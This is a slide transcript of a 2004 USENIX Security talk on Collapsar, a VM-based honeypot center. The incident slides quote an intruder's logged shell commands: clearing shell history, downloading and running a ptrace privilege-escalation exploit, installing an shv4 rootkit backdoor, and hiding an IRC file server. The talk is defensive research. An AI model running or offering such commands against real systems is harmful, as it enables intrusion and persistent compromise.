Collapsar: A VM-Based Architecture for Network Attack Detention
Download
Report
Transcript Collapsar: A VM-Based Architecture for Network Attack Detention
USENIX Security 2004
Collapsar: A VM-Based Architecture for
Network Attack Detention Center
Xuxian Jiang, Dongyan Xu
Department of Computer Sciences
Center for Education and Research in Information
Assurance and Security (CERIAS)
Purdue University
Outline
Motivation
Collapsar architecture and features
Collapsar design, implementation, and
performance
Collapsar deployment and real-world incidents
Conclusion and on-going work
Motivation
Need for network attack containment and
monitoring
Worm outbreaks (MSBlaster, Sasser…)
Debian project servers hacked (Nov. 2003)
PlanetLab nodes compromised (Dec. 2003)
And more
Motivation
Promise of honeypots
Providing insights into intruders’ motivations,
tactics, and tools
Highly concentrated datasets w/ low noise
Low false-positive and false negative rate
Discovering unknown vulnerabilities/exploitations
Example: CERT advisory CA-2002-01 (solaris CDE
subprocess control daemon – dtspcd)
Current Honeypot Operation
Individual honeypots
Limited local view of attacks
Federation of distributed honeypots
Deploying honeypots in different networks
Exchanging logs and alerts
Problems
Difficulties in distributed management
Lack of honeypot expertise
Inconsistency in security and management policies
Example: log format, sharing policy, exchange frequency
Our Solution: Collapsar
Based on the HoneyFarm idea of Lance Spitzner
Achieving two (seemingly) conflicting goals
Distributed honeypot presence
Centralized honeypot operation
Key ideas
Leveraging unused IP addresses in each network
Diverting corresponding traffic to a “detention”
center (transparently)
Creating VM-based honeypots in the center
Collapsar Architecture
Production
Network
Redirector
Attacker
Production
Network
Redirector
Redirector
Front-End
Production
Network
VM-based
Honeypot
Management
Station
Correlation
Engine
Collapsar
Center
Comparison with Current Approaches
Overlay-based approach (e.g., NetBait, Domino
overlay)
Honeypots deployed in different sites
Logs aggregated from distributed honeypots
Data mining performed on aggregated log
information
Key difference: where the attacks take place
(on-site vs. off-site)
Comparison with Current Approaches
Sinkhole networking approach (e.g., iSink )
“Dark” space to monitor Internet abnormality and
commotion (e.g. msblaster worms)
Limited interaction for better scalability
Key difference: contiguous large address blocks
(vs. scattered addresses)
Comparison with Current Approaches
Low-interaction approach (e.g., honeyd, iSink )
Highly scalable deployment
Low security risks
Key difference: emulated services (vs. real things)
Less effective to reveal unknown vulnerabilities
Less effective to capture 0-day worms
Collapsar Design
Functional components
Redirector
Collapsar Front-End
Virtual honeypots
Assurance modules
Logging module
Tarpitting module
Correlation module
Functional Components
Redirector
Running in each participating network
Capturing traffic toward unused IP addresses
Redirecting to Collapsar Front-End
Two implementation options
Proxy-ARP approach
Longer latency
Minimum change to network infrastructure
GRE (Generic Routing Encapsulation) approach
Lower latency
Requiring router re-configuration
Missing attack traffic from inside a domain
Functional Components
Collapsar Front-End
Dispatching incoming traffic to different
honeypots
Transparent bridging
Mitigating security risks
Transparent firewalling
Packet re-writing
Assurance module plug-in
Logging modules
Tarpitting modules
Functional Components
Virtual honeypots
VM-based high-interaction honeypots
VMware
Enhanced User-Mode Linux (UML)
Commodity OS and popular services
Linux, Windows, Solaris, FreeBSD
Apache, samba, sendmail, named
Capability of forensic analysis
System image snapshot / restoration
Assurance Modules
Logging module
Traffic logging
(e.g., tcpdump, snort)
Where: Front-End and honeypots
Keystroke logging
(e.g., sebek)
Where: honeypots
Tarpitting module
Mitigating security risks
Where: Front-End
Correlation module
Mining and correlation
(e.g., snort-inline)
Performance Measurement
Measurement set-up
Collapsar
Center
VMware or UML
H
A
Redirector
Dell Desktop PC
(1.8GHz Pentium 4/768MB Memory)
Front-End
Dell PowerEdge Server
(2.6GHz Xeon/2GB Memory)
Metrics
TCP throughput
Nock (http://www.cs.wisc.edu/~zandy/p/nock)
ICMP latency
Measurement Results
TCP throughput
Measurement Results
ICMP latency
Collapsar Deployment
Deployed in a local environment for a two-month
period in 2003
Traffic redirected from five networks
Three wired LANs
One wireless LAN
One DSL network
~ 40 honeypots analyzed so far
Internet worms (MSBlaster, Enbiei, Nachi )
Interactive intrusions (Apache, Samba)
OS: Windows, Linux, Solaris, FreeBSD
Incident: Apache Honeypot/VMware
Vulnerabilities
Vul 1: Apache (CERT® CA-2002-17)
Vul 2: Ptrace (CERT® VU-6288429)
Time-line
Deployed: 23:44:03pm, 11/24/03
Compromised: 09:33:55am, 11/25/03
Attack monitoring
Detailed log
http://www.cs.purdue.edu/homes/jiangx/collapsar
Incident: Apache Honeypot/VMware
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export
HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz
Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`'
******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhatrelease`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suserelease`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat
/etc/slackware-version`; fi; uname -a; id; echo
1. Gaining a regular
account: apache
[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp
[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget
http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc
ptrace-kmod.c -o p;./p
2. Escalating to the
root privilege
Incident: Apache Honeypot/VMware
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget
http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf
shv4.tar.gz;cd shv4;./setup rooter 1985
3. Installing a set
of backdoors
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTYRelease-0.53b
[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser
ftpd;su ftpd
[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd;
4. Adding the ftp user
mkdir .logs;cd .logs
and installing a
[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget
IRC-based ftp server
http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf
iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make
[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst
[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm
[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null &
Incident: Windows XP Honeypot/VMware
Vulnerability
RPC DCOM Vul. (Microsoft
Security Bulletin MS03-026)
Time-line
Deployed: 22:10:00pm,
11/26/03
MSBlaster: 00:36:47am,
11/27/03
Enbiei: 01:48:57am,
11/27/03
Nachi: 07:03:55am,
11/27/03
Log Correlation: Stepping Stone
iii.jjj.kkk.11 compromised a honeypot
& installed a rootkit, which contained
an ssh backdoor
xx.yyy.zzz.3 connected to the ssh
backdoor using the same passwd
Log Correlation: Network Scanning
Conclusions
A new architecture for attack containment and
monitoring
Distributed presence and centralized operation of
honeypots
Good potential in attack correlation and log mining
Unique features
Aggregation of Scattered unused IP addresses
Off-site (relative to participating networks) attack
occurrences and monitoring
Real services for unknown vulnerability revelation
On-going Work
Integration into trusted server architectures
(SODA and Poly2)
On-demand honeypot customization
Collapsar center federation
Scalability
Testbed for worm containment (coming soon)
Thank you.
For more information:
Email: {dxu, jiangx}@cs.purdue.edu
URL: www.cs.purdue.edu/~dxu
Google: “Purdue Collapsar friends”